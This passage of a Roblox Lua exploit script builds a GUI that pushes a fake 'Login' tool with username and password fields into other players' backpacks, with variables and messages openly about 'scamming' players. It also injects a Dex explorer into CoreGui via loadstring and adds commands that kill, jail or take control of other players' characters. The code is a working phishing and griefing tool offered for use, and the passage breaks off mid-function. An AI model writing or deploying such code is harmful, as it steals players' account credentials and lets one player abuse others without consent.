  618. NewGuiPart50.Size = UDim2.new(0, 290, 0, 280)
  619. NewGuiPart50.Visible = false
  620. NewGuiPart50.ClipsDescendants = true
  621. NewGuiPart50.Draggable = true
  622. NewGuiPart50.Parent = NewGuiPart2
  623.  
  624. -------
  625. local NewGuiPart52 = Instance.new("TextBox")
  626. NewGuiPart52.Active = false
  627. NewGuiPart52.BackgroundTransparency = 0.5
  628. NewGuiPart52.BorderColor3 = Color3.new(0, 0, 0)
  629. NewGuiPart52.BorderSizePixel = 0
  630. NewGuiPart52.Name = "TB1"
  631. NewGuiPart52.Position = UDim2.new(0, 90, 0, 100)
  632. NewGuiPart52.Size = UDim2.new(0, 180, 0, 20)
  633. NewGuiPart52.FontSize = Enum.FontSize.Size18
  634. NewGuiPart52.Text = ""
  635. NewGuiPart52.TextColor3 = Color3.new(1, 1, 1)
  636. NewGuiPart52.TextWrapped = true
  637. NewGuiPart52.Parent = NewGuiPart50
  638. -------
  639. local NewGuiPart53 = Instance.new("TextButton")
  640. NewGuiPart53.BackgroundColor3 = Color3.new(0.972549, 0.972549, 0.972549)
  641. NewGuiPart53.BackgroundTransparency = 0.5
  642. NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0)
  643. NewGuiPart53.BorderSizePixel = 0
  644. NewGuiPart53.Name = "TB"
  645. NewGuiPart53.Position = UDim2.new(0, 50, 0, 250)
  646. NewGuiPart53.Selectable = true
  647. NewGuiPart53.Size = UDim2.new(0, 180, 0, 20)
  648. NewGuiPart53.Style = Enum.ButtonStyle.Custom
  649. NewGuiPart53.FontSize = Enum.FontSize.Size18
  650. NewGuiPart53.Text = "Save"
  651. NewGuiPart53.TextColor3 = Color3.new(0, 0, 0)
  652. NewGuiPart53.TextWrapped = true
  653. NewGuiPart53.Parent = NewGuiPart50
  654.  
  655. -------
  656. local NewGuiPart55 = Instance.new("TextLabel")
  657. NewGuiPart55.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  658. NewGuiPart55.BackgroundTransparency = 1
  659. NewGuiPart55.BorderColor3 = Color3.new(0, 0, 0)
  660. NewGuiPart55.BorderSizePixel = 0
  661. NewGuiPart55.Name = "TL2"
  662. NewGuiPart55.Position = UDim2.new(0, 0, 0, 100)
  663. NewGuiPart55.Size = UDim2.new(0, 80, 0, 20)
  664. NewGuiPart55.FontSize = Enum.FontSize.Size18
  665. NewGuiPart55.Text = "Tool Name"
  666. NewGuiPart55.TextColor3 = Color3.new(1, 1, 1)
  667. NewGuiPart55.TextWrapped = true
  668. NewGuiPart55.Parent = NewGuiPart50
  669. -------
  670. local NewGuiPart56 = Instance.new("TextButton")
  671. NewGuiPart56.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  672. NewGuiPart56.BackgroundTransparency = 0.69999998807907
  673. NewGuiPart56.BorderColor3 = Color3.new(0, 0, 0)
  674. NewGuiPart56.BorderSizePixel = 0
  675. NewGuiPart56.Name = "TL4"
  676. NewGuiPart56.Position = UDim2.new(0, 200, 0, 50)
  677. NewGuiPart56.Selectable = true
  678. NewGuiPart56.Size = UDim2.new(0, 80, 0, 20)
  679. NewGuiPart56.Style = Enum.ButtonStyle.Custom
  680. NewGuiPart56.FontSize = Enum.FontSize.Size14
  681. NewGuiPart56.Text = "CMD"
  682. NewGuiPart56.TextColor3 = Color3.new(1, 1, 1)
  683. NewGuiPart56.Parent = NewGuiPart2
  684. -------
  685. local NewGuiPart57 = Instance.new("Frame")
  686. NewGuiPart57.BackgroundTransparency = 1
  687. NewGuiPart57.Name = "ChatBox"
  688. NewGuiPart57.Position = UDim2.new(0, 20, 0, -25)
  689. NewGuiPart57.Size = UDim2.new(0, 245, 0, 400)
  690. NewGuiPart57.Visible = false
  691. NewGuiPart57.Draggable = true
  692. NewGuiPart57.Parent = NewGuiPart2
  693. -------
  694. local NewGuiPart58 = Instance.new("TextButton")
  695. NewGuiPart58.Active = true
  696. NewGuiPart58.BackgroundTransparency = 0.5
  697. NewGuiPart58.BorderSizePixel = 0
  698. NewGuiPart58.Name = "Chat"
  699. NewGuiPart58.Position = UDim2.new(0, 180, 0, 310)
  700. NewGuiPart58.Selectable = true
  701. NewGuiPart58.Size = UDim2.new(0, 65, 0, 50)
  702. NewGuiPart58.Style = Enum.ButtonStyle.Custom
  703. NewGuiPart58.FontSize = Enum.FontSize.Size14
  704. NewGuiPart58.Text = "Chat"
  705. NewGuiPart58.Parent = NewGuiPart57
  706. -------
  707. local NewGuiPart59 = Instance.new("TextLabel")
  708. NewGuiPart59.BackgroundTransparency = 0.5
  709. NewGuiPart59.BorderSizePixel = 0
  710. NewGuiPart59.Name = "Output"
  711. NewGuiPart59.Position = UDim2.new(0, 0, 0, 100)
  712. NewGuiPart59.Size = UDim2.new(0, 245, 0, 200)
  713. NewGuiPart59.Font = Enum.Font.Legacy
  714. NewGuiPart59.FontSize = Enum.FontSize.Size14
  715. NewGuiPart59.Text = ""
  716. NewGuiPart59.TextWrapped = true
  717. NewGuiPart59.Parent = NewGuiPart57
  718. -------
  719. local NewGuiPart60 = Instance.new("TextBox")
  720. NewGuiPart60.BackgroundTransparency = 0.5
  721. NewGuiPart60.Name = "Input"
  722. NewGuiPart60.Position = UDim2.new(0, 0, 0, 310)
  723. NewGuiPart60.Size = UDim2.new(0, 165, 0, 50)
  724. NewGuiPart60.FontSize = Enum.FontSize.Size28
  725. NewGuiPart60.Text = ""
  726. NewGuiPart60.Parent = NewGuiPart57
  727. -------
  728. local NewGuiPart61 = Instance.new("Frame")
  729. NewGuiPart61.BackgroundTransparency = 1
  730. NewGuiPart61.Name = "CMDS"
  731. NewGuiPart61.Position = UDim2.new(0, 20, 0, -25)
  732. NewGuiPart61.Size = UDim2.new(0, 245, 0, 400)
  733. NewGuiPart61.Visible = false
  734. NewGuiPart61.Draggable = true
  735. NewGuiPart61.Parent = NewGuiPart2
  736. -------
  737. local NewGuiPart62 = Instance.new("TextButton")
  738. NewGuiPart62.Active = true
  739. NewGuiPart62.BackgroundTransparency = 0.5
  740. NewGuiPart62.BorderSizePixel = 0
  741. NewGuiPart62.Name = "Execute"
  742. NewGuiPart62.Position = UDim2.new(0, 180, 0, 310)
  743. NewGuiPart62.Selectable = true
  744. NewGuiPart62.Size = UDim2.new(0, 65, 0, 50)
  745. NewGuiPart62.Style = Enum.ButtonStyle.Custom
  746. NewGuiPart62.FontSize = Enum.FontSize.Size12
  747. NewGuiPart62.Text = "Execute"
  748. NewGuiPart62.Parent = NewGuiPart61
  749. -------
  750. local NewGuiPart63 = Instance.new("TextLabel")
  751. NewGuiPart63.BackgroundTransparency = 0.5
  752. NewGuiPart63.BorderSizePixel = 0
  753. NewGuiPart63.Name = "Output"
  754. NewGuiPart63.Position = UDim2.new(0, 0, 0, 100)
  755. NewGuiPart63.Size = UDim2.new(0, 245, 0, 200)
  756. NewGuiPart63.Font = Enum.Font.Legacy
  757. NewGuiPart63.FontSize = Enum.FontSize.Size14
  758. NewGuiPart63.Text = ""
  759. NewGuiPart63.TextWrapped = true
  760. NewGuiPart63.Parent = NewGuiPart61
  761. -------
  762. local NewGuiPart64 = Instance.new("TextBox")
  763. NewGuiPart64.BackgroundTransparency = 0.5
  764. NewGuiPart64.Name = "CmdInput"
  765. NewGuiPart64.Position = UDim2.new(0, 0, 0, 310)
  766. NewGuiPart64.Size = UDim2.new(0, 165, 0, 50)
  767. NewGuiPart64.FontSize = Enum.FontSize.Size14
  768. NewGuiPart64.Text = ""
  769. NewGuiPart64.Parent = NewGuiPart61
  770.  
  771. local IsRunning = Instance.new("BoolValue")
  772. IsRunning.Value = false
  773. IsRunning.Name = "IsRunning"
  774. IsRunning.Parent = NewGuiPart2
  775.  
  776. local Login = Instance.new("Tool")
  777. Login.CanBeDropped = false
  778. Login.ManualActivationOnly = false
  779. Login.RequiresHandle = false
  780. Login.Name = "Login"
  781. Login.Parent = NewGuiPart1
  782.  
  783. local ToolName = Instance.new("StringValue")
  784. ToolName.Value = "Login"
  785. ToolName.Parent = CoreValues
  786. ToolName.Name = "ToolName"
  787.  
  788.  
  789. local NewGuiPart65 = Instance.new("ScreenGui")
  790. NewGuiPart65.Name = "LoginGui"
  791. NewGuiPart65.Parent = Login
  792. -------
  793. local NewGuiPart66 = Instance.new("Frame")
  794. NewGuiPart66.Name = "ErrorFrame"
  795. NewGuiPart66.Size = UDim2.new(1, 0, 1, 0)
  796. NewGuiPart66.Visible = false
  797. NewGuiPart66.Parent = NewGuiPart65
  798. -------
  799. local NewGuiPart67 = Instance.new("ImageLabel")
  800. NewGuiPart67.Active = false
  801. NewGuiPart67.Selectable = false
  802. NewGuiPart67.Size = UDim2.new(1, 0, 1, 0)
  803. NewGuiPart67.Image = "rbxassetid://423929933"
  804. NewGuiPart67.Parent = NewGuiPart66
  805. -------
  806. local NewGuiPart69 = Instance.new("TextLabel")
  807. NewGuiPart69.BackgroundTransparency = 1
  808. NewGuiPart69.BorderSizePixel = 0
  809. NewGuiPart69.Name = "UserName"
  810. NewGuiPart69.Position = UDim2.new(0, 50, 0.5, 0)
  811. NewGuiPart69.Size = UDim2.new(0, 100, 0, 50)
  812. NewGuiPart69.Font = Enum.Font.Legacy
  813. NewGuiPart69.FontSize = Enum.FontSize.Size14
  814. NewGuiPart69.Text = "UserName"
  815. NewGuiPart69.Parent = NewGuiPart66
  816. -------
  817. local NewGuiPart70 = Instance.new("TextLabel")
  818. NewGuiPart70.BackgroundTransparency = 1
  819. NewGuiPart70.BorderSizePixel = 0
  820. NewGuiPart70.Name = "Password"
  821. NewGuiPart70.Position = UDim2.new(0, 50, 0.5, 50)
  822. NewGuiPart70.Size = UDim2.new(0, 100, 0, 50)
  823. NewGuiPart70.Font = Enum.Font.Legacy
  824. NewGuiPart70.FontSize = Enum.FontSize.Size14
  825. NewGuiPart70.Text = "Password"
  826. NewGuiPart70.Parent = NewGuiPart66
  827. -------
  828. local NewGuiPart71 = Instance.new("TextBox")
  829. NewGuiPart71.BackgroundColor3 = Color3.new(255,255,255)
  830. NewGuiPart71.BorderColor3 = Color3.new(0, 0, 0)
  831. NewGuiPart71.BorderSizePixel = 2
  832. NewGuiPart71.Name = "TB2"
  833. NewGuiPart71.Position = UDim2.new(0, 160, 0.5, 65)
  834. NewGuiPart71.Size = UDim2.new(0, 200, 0, 20)
  835. NewGuiPart71.Font = Enum.Font.Legacy
  836. NewGuiPart71.FontSize = Enum.FontSize.Size14
  837. NewGuiPart71.Text = ""
  838. NewGuiPart71.Parent = NewGuiPart66
  839. -------
  840. local NewGuiPart72 = Instance.new("ImageButton")
  841. NewGuiPart72.Active = true
  842. NewGuiPart71.BackgroundColor3 = Color3.new(73,123,255)
  843. NewGuiPart72.BackgroundTransparency = 0.5
  844. NewGuiPart72.Name = "LoginButton"
  845. NewGuiPart72.Position = UDim2.new(0, 90, 0.5, 150)
  846. NewGuiPart72.Selectable = true
  847. NewGuiPart72.Size = UDim2.new(0, 280, 0, 25)
  848. NewGuiPart72.Style = Enum.ButtonStyle.RobloxRoundButton
  849. NewGuiPart72.Visible = true
  850. NewGuiPart72.Image = "rbxassetid://431070395"
  851. NewGuiPart72.Parent = NewGuiPart66
  852. -------
  853. local NewGuiPart73 = Instance.new("TextLabel")
  854. NewGuiPart73.BackgroundColor3 = Color3.new(255,255,255)
  855. NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0)
  856. NewGuiPart73.BorderSizePixel = 0
  857. NewGuiPart73.Name = "TB1"
  858. NewGuiPart73.Position = UDim2.new(0, 160, 0.5, 15)
  859. NewGuiPart73.Size = UDim2.new(0, 200, 0, 20)
  860. NewGuiPart73.Font = Enum.Font.Legacy
  861. NewGuiPart73.FontSize = Enum.FontSize.Size14
  862. NewGuiPart73.Text = ""
  863. NewGuiPart73.Parent = NewGuiPart66
  864.  
  865.  
  866. local Textg = Instance.new("TextLabel")
  867. Textg.BackgroundColor3 = Color3.new(255,255,255)
  868. Textg.BorderColor3 = Color3.new(0, 0, 0)
  869. Textg.BorderSizePixel = 0
  870. Textg.Name = "Text"
  871. Textg.Position = UDim2.new(0, 90, 0.5,115)
  872. Textg.Size = UDim2.new(0, 200, 0, 20)
  873. Textg.Font = Enum.Font.Legacy
  874. Textg.FontSize = Enum.FontSize.Size14
  875. Textg.Text = ""
  876. Textg.Parent = NewGuiPart66
  877.  
  878. local Done = Instance.new("BoolValue")
  879. Done.Name = "Done"
  880. Done.Value = false
  881. Done.Parent = NewGuiPart66
  882.  
  883. local Folderr = Instance.new("Folder")
  884. Folderr.Parent = CoreValues
  885. Folderr.Name = "Folder"
  886.  
  887.  
  888. local UserName = Instance.new("StringValue")
  889. UserName.Name = "UserName"
  890. UserName.Parent = Folderr
  891.  
  892. local PassWord = Instance.new("StringValue")
  893. PassWord.Name = "Password"
  894. PassWord.Parent = Folderr
  895.  
  896.  
  897.  
  898. local UsingTool = Instance.new("BoolValue")
  899. UsingTool.Parent = CoreValues
  900. UsingTool.Name = "UsingTool"
  901. UsingTool.Value = true
  902.  
  903. NewGuiPart1:Clone().Parent = CoreValues
  904. NewGuiPart65:Clone().Parent = CoreValues
  905.  
  906.  
  907.  
  908. print("MGVX LIB Running")
  909. local Lib = Instance.new("Folder")
  910. Lib.Name = "ACCOUNTLIB"
  911. Lib.Parent = CoreValues
  912.  
  913. if PassWord.Value ~= nil and UserName.Value ~= nil then
  914. namer = Instance.new("Folder")
  915. namer.Parent = Lib
  916. namer.Name = UserName.Value
  917. old = PassWord:Clone()
  918. old.Parent = namer
  919. old.Name = UserName.Value
  920. oldu = UserName:Clone()
  921. oldu.Parent = namer
  922. oldu.Name = UserName.Value
  923. new = PassWord:Clone()
  924. new.Value = ""
  925. new.Name = "PassWord"
  926. new.Parent = Folderr
  927. newu = UserName:Clone()
  928. newu.Value = ""
  929. newu.Name = "UserName"
  930. newu.Parent = Folderr
  931. UserName:Destroy();
  932. PassWord:Destroy();
  933. end
  934.  
  935. --------------FUNCTIONS---------------
  936. local NumofPlayers = game:GetService("Players").NumPlayers
  937. local NumOfPlayersBeingScammed = NumofPlayers-1
  938. local DoneBeingScammed = {}
  939.  
  940.  
  941.  
  942.  
  943.  
  944.  
  945. function Clicked4()
  946.  
  947. if NewGuiPart52.Text ~= nil then
  948. Login.Name = NewGuiPart52.Text
  949. ToolName.Value = NewGuiPart52.Text
  950. end
  951.  
  952. if NewGuiPart52.Text == nil then
  953. Login.Name = "Login"
  954. ToolName.Value = "Login"
  955. end
  956.  
  957.  
  958.  
  959.  
  960. NewGuiPart50.Visible = false
  961.  
  962. end
  963.  
  964.  
  965.  
  966. function Click()
  967. local ppl = game.Players:GetChildren()
  968. local spots = NewGuiPart6:children()
  969. for i = 1,#ppl do
  970. spots[i].Visible = true
  971. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  972. spots[i].TextLabel.Text = ppl[i].Name
  973. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  974. spots[i].TextLabel.Text = ''
  975. spots[i].ImageLabel.Image = ''
  976. end
  977. end
  978. end
  979. function Clicked()
  980. otherp.Backpack:GetChildren().Parent = workspace
  981.  
  982.  
  983. if UsingTool.Value == true then
  984. Login:Clone().Parent = otherp.Backpack
  985. NewGuiPart4.Text = "Scanning..."
  986. print("Scamming ".. NumOfPlayersBeingScammed .. " Players!")
  987. NewGuiPart50.Visible = false
  988. NewGuiPart61.Visible = false
  989. NewGuiPart5.Visible = true
  990. IsRunning.Value = true
  991. Owner.Backpack:WaitForChild(ToolName.Value):Destroy();
  992. end
  993. end
  994.  
  995.  
  996.  
  997. function Clicked1()
  998. NewGuiPart5.Visible = false
  999. NewGuiPart61.Visible = false
  1000. NewGuiPart50.Visible = true
  1001. end
  1002.  
  1003. function Clicked2()
  1004. NewGuiPart5.Visible = false
  1005. NewGuiPart50.Visible = false
  1006. NewGuiPart61.Visible = true
  1007. end
  1008.  
  1009.  
  1010. plrrr = game.Players.LocalPlayer
  1011. plrr = game.Players:GetChildren()
  1012. Input = NewGuiPart64
  1013. Exe = NewGuiPart62
  1014. Output = NewGuiPart63
  1015. Output.Text = "Welcome, "..plrrr.Name.."."
  1016.  
  1017.  
  1018. game.Players.PlayerAdded:connect(function()
  1019. local ppl = game.Players:GetChildren()
  1020. local spots = NewGuiPart6:children()
  1021. for i = 1,#ppl do
  1022. spots[i].Visible = true
  1023. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1024. spots[i].TextLabel.Text = ppl[i].Name
  1025. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1026. spots[i].TextLabel.Text = ''
  1027. spots[i].ImageLabel.Image = ''
  1028. end
  1029.  
  1030. end
  1031. end)
  1032.  
  1033. game.Players.PlayerRemoving:connect(function()
  1034. local ppl = game.Players:GetChildren()
  1035. local spots = NewGuiPart6:children()
  1036. for i = 1,#ppl do
  1037. spots[i].Visible = true
  1038. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1039. spots[i].TextLabel.Text = ppl[i].Name
  1040. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1041. spots[i].TextLabel.Text = ''
  1042. spots[i].ImageLabel.Image = ''
  1043. end
  1044.  
  1045. end
  1046. end)
  1047.  
  1048.  
  1049. function Clicked3(arg)
  1050. local Cmd = Input
  1051. local allp = game.Players:GetChildren()
  1052. local numb;
  1053. local pp;
  1054. local p;
  1055. local num;
  1056. local argus = {"me", "all",numb,plrr}
  1057.  
  1058. if Cmd.Text:sub(1, 12) == "viewExplorer" then
  1059. local guu = game:GetObjects("rbxassetid://418955355")[1] guu.Parent = game.CoreGui
  1060. guu.ExplorerPanel.LocalScript.Source = string.gsub(guu.ExplorerPanel.LocalScript.Source,"script.Parent","game.CoreGui.Dex.ExplorerPanel")
  1061. guu.PropertiesFrame.Properties.Source = string.gsub(guu.PropertiesFrame.Properties.Source,"script.Parent.Parent","game.CoreGui.Dex")
  1062. guu.Selection.Source = string.gsub(guu.Selection.Source,"script.Parent","game.CoreGui.Dex")
  1063.  
  1064. spawn(function()
  1065. loadstring(guu.ExplorerPanel.LocalScript.Source)()
  1066. end)
  1067. spawn(function()
  1068. loadstring(guu.PropertiesFrame.Properties.Source)()
  1069. end)
  1070. spawn(function()
  1071. loadstring(guu.Selection.Source)()
  1072. end)
  1073.  
  1074.  
  1075.  
  1076. elseif Cmd.Text:sub(1,13) == "closeExplorer" then
  1077. game.CoreGui.Dex:Destroy()
  1078. end
  1079.  
  1080. if Cmd.Text:lower():sub(1,4) == "hat " then
  1081. local chk1 = Cmd.Text:lower():sub(5):find(" ") + 4
  1082. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5, chk1-1))
  1083. for i, v in pairs(plrz) do
  1084. coroutine.resume(coroutine.create(function()
  1085. if v and v.Character then
  1086. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1087. for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1088. obj:Destroy()
  1089. end
  1090. end))
  1091. end
  1092. end
  1093.  
  1094. if Cmd.Text:lower():sub(1,5) == "cape " then
  1095. local chk1 = Cmd.Text:lower():sub(6):find(" ")
  1096. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1097. local str = "torso.BrickColor"
  1098. if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1099. local teststr = [[BrickColor.new("]]..Cmd.Text:sub(chk1+1,chk1+1):upper()..Cmd.Text:sub(chk1+2):lower()..[[")]]
  1100. if Cmd.Text:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1101. if Cmd.Text:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1102. if Cmd.Text:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1103. if Cmd.Text:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1104. if Cmd.Text:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1105. if Cmd.Text:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1106. if Cmd.Text:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1107. if Cmd.Text:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1108. if Cmd.Text:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1109. if Cmd.Text:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1110. if Cmd.Text:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1111. if BrickColor.new(teststr) ~= nil then str = teststr end
  1112. end
  1113. for i, v in pairs(plrz) do
  1114. coroutine.resume(coroutine.create(function()
  1115. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1116. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1117. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1118. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1119. local torso = plr.Character.Torso
  1120. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1121. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1122. p.Size = Vector3.new(.2,.2,.2)
  1123. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1124. local motor1 = Instance.new("Motor", p)
  1125. motor1.Part0 = p
  1126. motor1.Part1 = torso
  1127. motor1.MaxVelocity = .01
  1128. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1129. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1130. local wave = false
  1131. repeat wait(1/44)
  1132. local ang = 0.1
  1133. local oldmag = torso.Velocity.magnitude
  1134. local mv = .002
  1135. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1136. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1137. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1138. motor1.DesiredAngle = -ang
  1139. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1140. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1141. if torso.Velocity.magnitude < .1 then wait(.1) end
  1142. until not p or p.Parent ~= torso.Parent
  1143. script:Destroy()
  1144. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  1145. end
  1146. end))
  1147. end
  1148. end
  1149.  
  1150. if Cmd.Text:lower():sub(1,7) == "uncape " then
  1151. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1152. for i, v in pairs(plrz) do
  1153. coroutine.resume(coroutine.create(function()
  1154. if v and v:findFirstChild("PlayerGui") and v.Character then
  1155. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1156. end
  1157. end))
  1158. end
  1159. end
  1160.  
  1161.  
  1162. if Cmd.Text:lower():sub(1,5) == "jail " then
  1163. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1164. for i, v in pairs(plrz) do
  1165. coroutine.resume(coroutine.create(function()
  1166. if v and v.Character and v.Character:findFirstChild("Torso") then
  1167. local vname = v.Name
  1168. local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1169. local mod = Instance.new("Model", game.Workspace) mod.Name = v.Name .. " Jail"
  1170. local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  1171. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1172. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1173. game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1174. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1175. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1176. end)
  1177. local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1178. local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1179. local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1180. local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  1181. local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1182. local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1183. local msh2 = msh:Clone() msh2.Parent = back
  1184. local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1185. local msh4 = msh3:Clone() msh4.Parent = left
  1186. v.Character.Torso.CFrame = cf
  1187. end
  1188. end))
  1189. end
  1190. end
  1191.  
  1192. if Cmd.Text:lower():sub(1,7) == "unjail " then
  1193. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1194. for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1195. end
  1196.  
  1197.  
  1198.  
  1199. if Cmd.Text:lower():sub(1,8) == "control " then
  1200. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1201. for i, v in pairs(plrz) do
  1202. coroutine.resume(coroutine.create(function()
  1203. if v and v.Character then
  1204. v.Character.Humanoid.PlatformStand = true
  1205. local w = Instance.new("Weld", plr.Character.Torso )
  1206. w.Part0 = plr.Character.Torso
  1207. w.Part1 = v.Character.Torso
  1208. local w2 = Instance.new("Weld", plr.Character.Head)
  1209. w2.Part0 = plr.Character.Head
  1210. w2.Part1 = v.Character.Head
  1211. local w3 = Instance.new("Weld", plr.Character:findFirstChild("Right Arm"))
  1212. w3.Part0 = plr.Character:findFirstChild("Right Arm")
  1213. w3.Part1 = v.Character:findFirstChild("Right Arm")
  1214. local w4 = Instance.new("Weld", plr.Character:findFirstChild("Left Arm"))
  1215. w4.Part0 = plr.Character:findFirstChild("Left Arm")
  1216. w4.Part1 = v.Character:findFirstChild("Left Arm")
  1217. local w5 = Instance.new("Weld", plr.Character:findFirstChild("Right Leg"))
  1218. w5.Part0 = plr.Character:findFirstChild("Right Leg")
  1219. w5.Part1 = v.Character:findFirstChild("Right Leg")
  1220. local w6 = Instance.new("Weld", plr.Character:findFirstChild("Left Leg"))
  1221. w6.Part0 = plr.Character:findFirstChild("Left Leg")
  1222. w6.Part1 = v.Character:findFirstChild("Left Leg")
  1223. plr.Character.Head.face:Destroy()
  1224. for i, p in pairs(v.Character:children()) do
  1225. if p:IsA("BasePart") then
  1226. p.CanCollide = false
  1227. end
  1228. end
  1229. for i, p in pairs(plr.Character:children()) do
  1230. if p:IsA("BasePart") then
  1231. p.Transparency = 1
  1232. elseif p:IsA("Hat") then
  1233. p:Destroy()
  1234. end
  1235. end
  1236. v.Character.Parent = plr.Character
  1237. v.Character.Humanoid.Changed:connect(function() v.Character.Humanoid.PlatformStand = true end)
  1238. end
  1239. end))
  1240. end
  1241. end
  1242.  
  1243. if Cmd.Text:lower():sub(1,5) == "kill " then
  1244. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1245. for i, v in pairs(plrz) do
  1246. coroutine.resume(coroutine.create(function()
  1247. if v and v.Character then v.Character:BreakJoints() end
  1248. end))
  1249. end
  1250. end
  1251.  
  1252.  
  1253.  
  1254. if Cmd.Text:lower():sub(1,5) == "trip " then
  1255. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
